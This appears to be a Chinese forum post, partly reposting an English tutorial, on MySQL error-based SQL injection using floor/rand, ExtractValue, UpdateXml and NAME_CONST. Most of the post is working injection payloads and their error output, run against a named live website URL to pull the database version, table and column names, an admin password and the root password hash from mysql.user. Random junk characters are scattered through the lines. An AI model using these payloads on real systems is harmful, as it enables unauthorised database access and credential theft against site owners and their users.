|
1、通过floor报错 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); 举例如下:
* I, |/ G$ s" b$ }7 K首先进行正常查询: mysql> select * from article where id = 1;
6 ?4 t- G4 q- ?9 ] J+—-+——-+———+
. C8 J- K* W* }# n. j- @| id | title | content |; G* d# J! e/ U, ^; C! `4 Y, ^
+—-+——-+———+
' e8 W+ U0 g$ H$ f, r k| 1 | test | do it |
. n2 Q5 b" ?' G7 ~% t$ q+—-+——-+———+ 假如id输入存在注入的话,可以通过如下语句进行报错。 mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);8 _2 k: M1 f6 {2 I1 I9 @& j
ERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’ 可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
, {" n( T0 C# [; |0 ^例如我们需要查询管理员用户名和密码: Method1: mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);5 Y; I3 L9 h, T8 M" o: U
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ Method2: mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));6 u5 D' z; l6 k4 A, ` H9 B
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ 2、ExtractValue2 G) ^9 k1 C* e: h( t" h
测试语句如下 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); 实际测试过程 mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–, g2 t1 K+ Z, q# t# a
ERROR 1105 (HY000): XPATH syntax error: ’\admin888′ 3、UpdateXml 测试语句 and 1=(updatexml(1,concat(0x3a,(select user())),1)) 实际测试过程 mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’ 3 G5 x- v: a$ a: { w3 B
+ P7 X0 s; H+ |8 f% Y
再收集: " n& r9 U6 I3 U& @
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c) # [7 e' ]- `5 Y2 O E
% o; J5 o% u6 O; jError uplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’5 }( h+ x* P/ m
/ B6 {7 Z# p6 p# `
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)8 A% g1 u* S+ r1 |0 c2 H: B
# _' Z( P, {. g+ Y- C( oErroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′ ' [) k2 G/ \0 @2 z
$ X& v0 M6 _, Y" r& V t Y6 Q6 [
MYSQL高版本报错注入技巧-利用NAME_CONST注入9 N1 t- ^% u6 M+ u& S( n2 u
It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it. * ~+ N9 {, U6 V
9 V) z! b% X! h) G1 w! c, e9 D( M x# f2 K* E7 X+ o4 Z9 C; U
相关信息
7 V5 V0 x0 W5 A6 {6 M. {' z" r' {$ z) X! |
NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.) Q% }$ ?8 `8 Q$ J; X5 ~
6 `" x7 c2 A- G# V- y3 X
Code:: C3 n4 I7 O% B& a4 S+ G
NAME_CONST(DATA, VALUE)
1 i: \' p) \* {6 w
; S$ e1 X+ B% u8 [8 z m" bReturns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
) D1 N g( `- g4 Z
' [. b! H F/ e9 J U1 W7 NSELECT NAME_CONST('TEST', 1)8 Z6 v8 q2 L' p* w8 n6 A$ w
# X V- C/ q, c* ~& d- f7 u
. Y( m5 k5 J/ e# w* H
( k' i Q5 y; i0 l2 ~|---------------|) m5 ]: ~9 R1 K& K( H# T/ l
| TEST |
, j* i) k4 W9 T| |6 o8 [, b* o9 B
|---------------|: X' o: K. q4 K/ m5 n% v
| 1 |
/ [/ j- _; y1 ~& i| |: `# d4 F F) R6 I* z
|---------------|
5 z; {% z6 E" L4 Z
) x+ |' y- m: Z2 e( @: W# g; F: u# ~9 x$ p
3 t. A8 p, V( m+ G+ W- A
( k1 o! \8 M4 H% X) @http://dev.mysql.com/doc/refman/5.0/en/m...name-const5 B* Y V; S0 i P; `% z
Intro to MySQL Variables
6 N+ b" q* Z0 }! |. f
6 H1 P2 w5 Z/ Y6 WOnce you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.3 z7 l2 Z( _: R3 M6 ?
3 n5 r9 s5 X/ D" z7 u U2 y9 X
Code:
) X1 Q i% K# ?4 ^http://www.baido.hk/qcwh/content ... ;sid=19&cid=261
3 D. U3 A3 N- C/ t% W( Z
/ ]5 Q- I6 a' R; O$ f
) S8 b( C4 i# q. t) |' A' _1 o# s$ J6 b
2 k: x0 W, T/ g& ]! [) I
! @1 B# \0 D& KCode:
( M: m4 w6 |3 Iand+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--. e6 R) i' ?+ U& ^
5 X/ Q$ d. p6 s1 t" ]1 O/ R; {5 e( T+ P9 e
VAR = Your MySQL variable.
1 f( i7 R$ ]8 a
$ N5 Z, X; Q) A( K+ M( e% wMySQL 5.1.3 Server System Variables
4 A: \ P4 H+ l1 v8 X
$ p# f2 f3 P6 q# b! j$ RLet's try it out on my site.. P K) C( ?/ _4 }5 \+ d0 R
) n2 ~, w7 L; p2 `7 Q' m( oCode:
* C! S. K9 `/ Y8 fhttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--1 `& }& L) k+ t; M' O2 w( e* M7 a; A
, g: @3 e& k9 E9 S
Erroruplicate column name '5.0.27-community-nt'
+ j4 N1 i c+ y3 V6 j
3 h$ D3 z1 ~% J6 e# R" q; H! s# c, p* c
4 y' p5 k4 L+ z4 C. _4 s; W& H1 N
2 H$ n6 ?! x: ^4 h! k+ B
4 [3 d/ w; B( fNow I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...
# l; \ P6 o' C
1 v7 P; m3 O6 p( N/ ~0 U& iData Extraction" t6 E4 p/ r' | y. d
9 J& M2 J" c" B* yCode:
% a* L \/ Z& t5 }, t+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--
2 v+ x" X% r+ e, t* ]7 z4 w
4 r5 \+ b \8 s5 s
! d4 r5 p% O/ Y: b1 mWe should get a duplicate column 1 error...
6 r# [: G6 S4 J, X7 e& S2 t2 p; }4 n5 _& N/ k
Code:1 u1 b: ^: [4 q. @
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--
[/ u- K) r/ ^) b L8 V- G) D G# _' z$ }- h
Erroruplicate column name '1
^! D: H( y4 I) ?7 b" P+ w2 U& M5 g. u& M5 t" k2 A
/ d$ k8 N6 u; [" O5 V. j6 t. w' X
; o2 _% p" q% b8 o
/ C6 H. u, R2 Y5 ]/ w( C. M: _& Q: G+ F/ {5 h: B. F
! o3 S6 N. m$ f& DNow let's get the tables out this bitch.., e7 h; p$ V$ x2 v. Q
( q3 x, k* {$ U: ]9 L/ U! I% ~
Code:
6 R) J$ p q2 G% x+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--$ I. B J h& P3 |3 v
2 w, A$ W9 O, O, l
2 P" O! z. g* K6 t4 p
Let's see if it works here, if it does, we can go on and finish the job.; q2 n4 }) R& x( s/ c4 O
" b( T4 T6 u8 s+ t
Code:" E$ V" z7 `0 u
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
1 P4 a; v* }- C C" L# @
[3 b% t4 [1 }7 h' {7 o- `# Z( P! G/ S. N. M8 `& j7 B0 C/ T
Erroruplicate column name 'com_admanage
- H# ]; l4 }/ W$ `! T" V
2 Y6 b0 S( k, ]7 U3 C4 b2 q3 |. k) b; L4 g- A. a" k3 T
# k) c; [- @8 O# T3 l1 m+ F
' x5 \0 A' h* Y m0 u1 a6 D z1 l9 z
6 u$ K, k$ C- V/ Y* X: `* O: _- y3 A, h) [3 a8 v# q; C; R
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time." h; k0 }4 [5 @) n! Y' |8 |
# g9 j, M8 V! o9 `0 _ F) j
Let's get the columns out of the user table..
% D0 q! C m, ?6 |# h! y, {5 Z! Q
0 K, x* n# G0 A% A7 Y0 p XCode:
6 T1 T& U. t' `0 g! w/ X# V3 M+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--4 D6 |( J5 f: K. v* h2 X* o
3 N7 c; A$ h- k2 d/ c
. Q0 g3 Q# K% {2 m3 [
So mine looks like this, and I get the duplicate column name 'Host'.
1 }1 c( B+ e2 Z7 Q& z( I4 J8 E: C2 b( C
Code:7 W* }$ a! T# O9 a
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--$ Y. k/ P; l# K: j1 ~- m: C$ u
' Q0 | D7 S5 C9 wErroruplicate column name 'Host'
' b! b7 U1 y7 I7 h) t( W/ L; A' d [. w7 Q5 U4 l
: n2 C' o+ l# Y
9 w; X) Q# l. |1 s% G+ p6 f7 r/ \
1 l) f. |/ ~7 V- O$ j( O
" t W2 R! \5 S! t ^! v% U4 R( }$ s. E" u
Woot, time to finish this bitch off.
! S' j+ |6 Y6 u
4 {5 L5 W( @% d5 wCode:9 q* p' P9 N, l; n0 ^5 k
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--. K9 ] b; m$ I
, {7 A6 @% n- K6 t1 V
- V o, u9 I$ ^9 c& P0 zSo mine looks like this...1 P7 f- B) R' A! ]
5 w* l4 i2 J6 O [% V3 rCode:
% U b; e% L. A) [) ?: [http://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--$ r5 T. v$ N0 ~
1 e# h* T) @* x. L/ g! n+ R9 Y5 }; z6 l
Erroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'% [& J; T. f' _8 E! v* _4 \# M
; { D' G6 z0 _; d% { S* A) y& D
' l$ I* x( F% Q6 V4 P! l
/ Q; Y# c$ Y0 Z- S
l; k3 O6 a- j3 x, t2 I
3 t; E7 W6 R, d9 U
0 b* s( H- ]3 y2 l' OAnd there we have it, thanks for reading.
: i6 c+ h. _. ?) P) Z- x- w* A+ l# T: h% p6 a2 W' u4 J- k
|
发表于 2015-11-11 19:03:37
收藏
支持
反对